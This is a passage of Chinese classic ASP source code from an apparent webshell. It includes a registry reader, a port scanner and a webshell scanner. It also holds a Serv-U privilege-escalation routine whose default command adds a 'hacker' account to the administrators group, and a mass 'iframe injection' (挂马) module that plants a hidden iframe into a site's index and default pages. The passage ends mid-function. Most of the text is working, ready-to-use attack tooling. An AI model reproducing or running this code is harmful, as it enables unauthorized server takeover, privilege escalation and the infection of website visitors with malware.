\services\tcpip\parameters\ipenablerouter,reg_dword,1 {允许ip路由}
<br/>"
rrs "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\defaultgateway,reg_muti_sz {默认网
关}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\nameserver {首dns}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\tcpallowedports {允许的tcp/ip端口}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\udpallowedports {允许的udp端口}<br/>"
rrs "-----------over--------------------<br/>"
rrs "hklm\system\controlset001\services\tcpip\enum\count {共几块活动网
卡}<br/>"
rrs "hklm\system\controlset001\services\tcpip\linkage\bind {当前网卡的
序列(把上面的替换)}<br/>"
rrs "</span>"
rrs "</form><hr/>"
if request("thepath")<>"" then
on error resume next
set wsx = server.createobject("wscript.shell")
thepath=request("thepath")
thearray=wsx.regread(thepath)
if isarray(thearray) then
for i=0 to ubound(thearray)
rrs "<li>" & thearray(i)
next
else
rrs "<li>" & thearray
end if
end if
end sub
sub scanport()
server.scripttimeout = 7776000
if request.form("port")="" then
portlist="21,23,25,80,110,135,139,445,1433,3389,43958"
else
portlist=request.form("port")
end if
if request.form("ip")="" then
ip="127.0.0.1"
else
ip=request.form("ip")
end if
rrs"<p>端口扫描器</p>"
rrs"<form name='form1' method='post' action=''
onsubmit='form1.submit.disabled=true;'>"
rrs"<p>scan ip: "
rrs" <input name='ip' type='text' class='textbox' id='ip'
value='"&request.servervariables("local_addr")&"' size='60'>"
rrs"<br>port list:"
rrs"<input name='port' type='text' class='textbox' size='60'
value='"&portlist&"'>"
rrs"<br><br>"
rrs"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
rrs"<input name='scan' type='hidden' id='scan' value='111'>"
rrs"</p></form>"
if request.form("scan") <> "" then
timer1 = timer
rrs("<b>扫描报告:</b><br><hr>")
tmp = split(request.form("port"),",")
ip = split(request.form("ip"),",")
for hu = 0 to ubound(ip)
if instr(ip(hu),"-") = 0 then
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ip(hu), tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ip(hu), j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
else
ipstart = mid(ip(hu),1,instrrev(ip(hu),"."))
for xxx = mid(ip(hu),instrrev(ip(hu),".")+1,1) to mid(ip(hu),instr(ip
(hu),"-")+1,len(ip(hu))-instr(ip(hu),"-"))
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ipstart & xxx, tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ipstart & xxx,j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
next
end if
next
timer2 = timer
thetime=cstr(int(timer2-timer1))
rrs"<hr>process in "&thetime&" s"
end if
end sub
sub scan(targetip, portnum)
on error resume next
set conn = server.createobject("adodb.connection")
connstr="provider=sqloledb.1;data source=" & targetip &","&
portnum &";user id=lake2;password=;"
conn.connectiontimeout = 1
conn.open connstr
if err then
if err.number = -2147217843 or err.number = -2147467259
then
if instr(err.description, "(connect()).") > 0
then
rrs(targetip & ":" & portnum &
".........关闭<br>")
else
rrs(targetip & ":" & portnum &
".........<font color=red>开放</font><br>")
end if
end if
end if
end sub
select case action
case "mainmenu":mainmenu()
case "getterminalinfo":getterminalinfo()
case "scanport":scanport()
case "servu"
suaction=request("suaction")
if not isnumeric(suaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "user " & user & vbcrlf
loginpass = "pass " & pass & vbcrlf
deldomain = "-deletedomain" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "
portno=" & ftpport & vbcrlf
mt = "site maintenance" & vbcrlf
newdomain = "-setdomain" & vbcrlf & "-domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbcrlf & "-tzoenable=0" & vbcrlf & " tzokey=" &
vbcrlf
newuser = "-setusersetup" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "-
portno=" & ftpport & vbcrlf & "-user=go" & vbcrlf & "-password=od" &
vbcrlf & _
"-homedir=c:\\" & vbcrlf & "-loginmesfile=" & vbcrlf & "-
disable=0" & vbcrlf & "-relpaths=1" & vbcrlf & _
"-needsecure=0" & vbcrlf & "-hidehidden=0" & vbcrlf & "-
alwaysallowlogin=0" & vbcrlf & "-changepassword=0" & vbcrlf & _
"-quotaenable=0" & vbcrlf & "-maxusersloginperip=-1" & vbcrlf &
"-speedlimitup=0" & vbcrlf & "-speedlimitdown=0" & vbcrlf & _
"-maxnrusers=-1" & vbcrlf & "-idletimeout=600" & vbcrlf & "-
sessiontimeout=-1" & vbcrlf & "-expire=0" & vbcrlf & "-ratioup=1" &
vbcrlf & _
"-ratiodown=1" & vbcrlf & "-ratioscredit=0" & vbcrlf & "-
quotacurrent=0" & vbcrlf & "-quotamaximum=0" & vbcrlf & _
"-maintenance=system" & vbcrlf & "-passwordtype=regular" &
vbcrlf & "-ratios=none" & vbcrlf & " access=c:\\|rwamelcdp" & vbcrlf
quit = "quit" & vbcrlf
newuser=replace(newuser,"c:",f)
select case suaction
case 1
set a=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",true,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='2'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
rrs"settimeout('document.all.goldsun.submit();',4000);"
rrs"</script>"
case 2
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
true, "", ""
b.send "user go" & vbcrlf & "pass od" & vbcrlf & "site exec " & cmd &
vbcrlf & quit
set session("b")=b
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='3'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在提升权限,请等待…………<center>');"
rrs"settimeout(""document.all.goldsun.submit();"",4000);"
rrs"</script>"
case 3
set c=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", true,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
rrs"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
rrs"<input type=button value=' 返回继续 ' onclick=""location.href='?
action=servu';"">"
rrs"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
set a = nothing
b.abort
set b = nothing
c.abort
set c = nothing
rrs"<center><form method='post' name='goldsun'>"
rrs"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
rrs"<tr align='center' valign='middle'>"
rrs"<td colspan='2'>serv-u 提升权限 漫步云端修改版</td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td width='100'>用户名:</td>"
rrs"<td width='379'><input name='u' type='text' id='u'
value='localadministrator'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>口 令:</td>"
rrs"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@p'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>端 口:</td>"
rrs"<td><input name='port' type='text' id='port' value='43958'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>系统路径:</td>"
rrs" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td>命 令:</td>"
rrs" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td colspan='2'><input type='submit' name='submit' value='提
交'> "
rrs"<input type='reset' name='submit2' value='重置'>"
rrs"<input name='suaction' type='hidden' id='action' value='1'></td>"
rrs"</tr></table></form></center>"
end select
function gpath()
on error resume next
err.clear
set f=server.createobject("scripting.filesystemobject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.getspecialfolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
case "kmuma"
dim report
if request.querystring("act")<>"scan" then
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form action=""?action=kmuma&act=scan""
method=""post"" name=""form1"">"
rrs "<p><b>填入你要检查的路径:</b>"
rrs "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
rrs "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onclick=""document.getelementbyid
('showfile1').style.display='none'"" checked>查asp 马"
rrs "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onclick=""document.getelementbyid
('showfile1').style.display=''"">搜索符合条件之文件<br>"
rrs "<br /><div id=""showfile1""
style=""display:none"">"
rrs " 查找内容:<input
name=""search_content"" type=""text"" id=""search_content""
style=""border:1px solid #999"" size=""20"">"
rrs " 要查找的字符串,不填就只进行日期检查<br />"
rrs " 修改日期:<input name=""search_date""
type=""text"" style=""border:1px solid #999"" value="""&left(now
(),instr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onclick=""javascript:form1.search_date.value='all'"">all</a><br />"
rrs " 文件类型:<input
name=""search_fileext"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
rrs "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
rrs "</form>"
else
if request.form("path")="" then
rrs("路径不能为空")
response.end()
end if
if request.form("path")="\" then
tmppath = server.mappath("\")
elseif request.form("path")="." then
tmppath = server.mappath(".")
else
tmppath = request.form("path")
end if
timer1 = timer
sun = 0
sumfiles = 0
sumfolders = 1
if request.form("radiobutton") = "sws" then
dimfileext = "asp,cer,asa,cdx"
call showallfile(tmppath)
else
if request.form("path") = "" or request.form
("search_date") = "" or request.form("search_fileext") = "" then
rrs("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.end()
end if
dimfileext = request.form("search_fileext")
call showallfile2(tmppath)
end if
rrs "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
rrs "<tr><th>scan webshell -- 漫步云端修改版</tr>"
rrs "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
rrs "<div id=""updateinfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
rrs "扫描完毕!一共检查文件夹<font
color=""#ff0000"">"&sumfolders&"</font>个,文件<font
color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font
color=""#ff0000"">"&sun&"</font>个"
rrs "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
if request.form("radiobutton") = "sws" then
rrs "<td width=""20%"">文件相对路径</td>"
rrs "<td width=""20%"">特征码</td>"
rrs "<td width=""40%"">描述</td>"
rrs "<td width=""20%"">创建/修改时间</td>"
else
rrs "<td width=""50%"">文件相对路径</td>"
rrs "<td width=""25%"">文件创建时间</td>"
rrs "<td width=""25%"">修改时间</td>"
end if
rrs "</tr>"
rrs report
rrs "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
rrs "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
sub showallfile(path)
set f1so = createobject("scripting.filesystemobject")
if not f1so.folderexists(path) then exit sub
set f = f1so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f1so.getextensionname
(path&"\"&myfile.name)) then
call scanfile(path&temp&"\"&myfile.name, "")
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f1so = nothing
end sub
sub scanfile(filepath, infile)
server.scripttimeout=999999999
if infile <> "" then
infiles = "<font color=red>该文件被<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(infile)&""" target=_blank>"& infile & "</a>文件包含执行</font>"
end if
set fso1s = createobject("scripting.filesystemobject")
on error resume next
set ofile = fso1s.opentextfile(filepath)
filetxt = lcase(ofile.readall())
if err then exit sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = "<a href=""http://"&request.servervariables
("server_name")&"/"&turlencode(replace(replace(filepath,server.mappath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(filepath,server.mappath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
if instr( filetxt, lcase
("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase
("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
report =
report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者
clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
if instr( filetxt, lcase
("she"&domybest&"ll.application") ) or instr( filetxt, lcase
("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
report =
report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者
clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "\blanguage\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\bev"&"al\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行
任意asp代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "[^.]\bexe"&"cute\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意asp代码
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.(open|create)textfile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.createtextfile|.opentextfile</td><td>
使用了fso的createtextfile|opentextfile读写文
件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.savetofile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.savetofile</td><td>使用了stream的
savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.save\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.save</td><td>使用了xmlhttp的save函数
写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( server.mappath("\")
&"\"&tfile, replace(filepath,server.mappath("\")&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()[^""]\)"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>server.exec"&"ute</td><td><font
color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
end if
set matches = nothing
set regex = nothing
set xregex = new regexp
xregex.ignorecase = true
xregex.global = true
xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
set xmatches = xregex.execute(filetxt)
for each match in xmatches
tmplake2 = mid(match.value, 1, instr
(match.value, ">"))
srcseek = instr(1, tmplake2, "src", 1)
if srcseek > 0 then
srcseek2 = instr(srcseek, tmplake2,
"=")
for i = 1 to 50
tmp = mid(tmplake2, srcseek2 +
i, 1)
if tmp <> " " and tmp <> chr(9)
and tmp <> vbcrlf then
exit for
end if
next
if tmp = """" then
tmpname = mid(tmplake2,
srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 -
i - 1)
else
if instr(srcseek2 + i + 1,
tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr
(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname =
tmplake2
if instr(tmpname, chr(9)) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
if instr(tmpname, vbcrlf) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
if instr(tmpname, ">") > 0 then
tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
end if
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tmpname , replace(filepath,server.mappath("\")
&"\","",1,1,1))
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "createo"&"bject[ |\t]*\(.*\)"
set matches = regex.execute(filetxt)
for each match in matches
if instr(match.value, "&") or instr
(match.value, "+") or instr(match.value, """") = 0 or instr
(match.value, "(") <> instrrev(match.value, "(") then
report =
report&"<tr><td>"&temp&"</td><td>creat"&"eobject</td><td>crea"&"teobjec
t函数使用了变形技术"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
exit sub
end if
next
set matches = nothing
set regex = nothing
end if
set ofile = nothing
set fso1s = nothing
end sub
function checkext(fileext)
if dimfileext = "*" then checkext = true
ext = split(dimfileext,",")
for i = 0 to ubound(ext)
if lcase(fileext) = ext(i) then
checkext = true
exit function
end if
next
end function
function getdatemodify(filepath)
set f2so = createobject("scripting.filesystemobject")
set f = f2so.getfile(filepath)
s = f.datelastmodified
set f = nothing
set f2so = nothing
getdatemodify = s
end function
function getdatecreate(filepath)
set f3so = createobject("scripting.filesystemobject")
set f = f3so.getfile(filepath)
s = f.datecreated
set f = nothing
set f3so = nothing
getdatecreate = s
end function
function turlencode(str)
temp = replace(str, "%", "%25")
temp = replace(temp, "#", "%23")
temp = replace(temp, "&", "%26")
turlencode = temp
end function
sub showallfile2(path)
set f4so = createobject("scripting.filesystemobject")
if not f4so.folderexists(path) then exit sub
set f = f4so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f4so.getextensionname
(path&"\"&myfile.name)) then
call isfind(path&"\"&myfile.name)
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile2 path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f4so = nothing
end sub
sub isfind(thepath)
thedate = getdatemodify(thepath)
on error resume next
thetmp = mid(thedate, 1, instr(thedate, " ") - 1)
if err then exit sub
xdate = split(request.form("search_date"),";")
if request.form("search_date") = "all" then alltime = true
for i = 0 to ubound(xdate)
if thetmp = xdate(i) or alltime = true then
if request("search_content") <> "" then
set fso2s = createobject
("scripting.filesystemobject")
set ofile = fso2s.opentextfile(thepath,
1, false, -2)
filetxt = lcase(ofile.readall())
if instr( filetxt, lcase(request.form
("search_content"))) > 0 then
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(thepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
report =
report&"<tr><td>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
ofile.close()
set ofile = nothing
set fso2s = nothing
else
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(filepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
end if
next
end sub
case "plgm"
server.scripttimeout=1000000
response.buffer=false
rrs ("<b>当前网站绝对路径:")&server.mappath("/")&("</b>")
asp_self=request.servervariables("path_info")
s=request("fd")
if s="" then s=server.mappath("/")
ex=request("ex")
pth=request("pth")
newcnt=request("newcnt")
addcode = request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
if ex<>"" and pth<>"" then
select case ex
case "edit"
call file_show(pth)
case "save"
call file_save(pth)
end select
else
rrs("<form method=""post""> ")
rrs("<table width=560 border=""0"" style=""font-size:12px;"">")
rrs("<tr>")
rrs("<td width=""102"">要挂马文件夹的绝对路径:</td>")
rrs("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
rrs("<td width=""69""> </td>")
rrs("</tr><tr><td>要挂马的代码:</td>")
rrs("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
rrs("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
rrs("</tr></table></form> ")
end if
function ispattern(patt,str)
set regex=new regexp
regex.pattern=patt
regex.ignorecase=true
retval=regex.test(str)
set regex=nothing
if retval=true then
ispattern=true
else
ispattern=false
end if
end function
if request.form("submit")<>"" then
if s="" or addcode="" then
rrs "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else if ispattern("[^ab]{1}:{1}(\\|\/)",s) then sch s
end if
end if
sub sch(s)
on error resume next
set fs=server.createobject("scripting.filesystemobject")
set fd=fs.getfolder(s)
set fi=fd.files
set sf=fd.subfolders
for each f in fi
rtn=f.path
step_all rtn
next
if sf.count<>0 then
for each l in sf
sch l
next
end if
end sub
sub step_all(agr)
retval=ispattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|qq|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
if retval then
step1 agr
step2 agr
else
exit sub
end if
end sub
sub step1(str1)
rrs "<div style='line-height:20px'>√ "&str1&" _"
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""downfile"")' class='am' title='下载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a></div>"
end sub
sub step2(str2)
set fs=server.createobject("scripting.filesystemobject")
isexist=fs.fileexists(str2)
if isexist then
